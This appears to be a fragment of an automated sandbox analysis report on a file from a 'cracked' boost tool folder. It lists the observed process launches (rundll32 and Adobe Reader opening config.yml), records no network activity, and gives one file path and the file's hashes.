"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\config.yml

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\config.yml"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 8ccb86072348b3b358b06da1ac9b1386
SHA1 bd991a40d57e337500547c4669e0ee070aeddfd1
SHA256 66fd2861bb99cde3fc762d404f88b96a0a6d6817e8196879ac688f03e1a220d6
SHA512 f0facf1c4b8fdbe8d1ff6dc27723376bf7c9f053fd4b33b68026ac54a1ded4ab9a581002c7a3381f15e4d46c7fb2a9ce3e3c0562406ac780c30f7abfa24041f0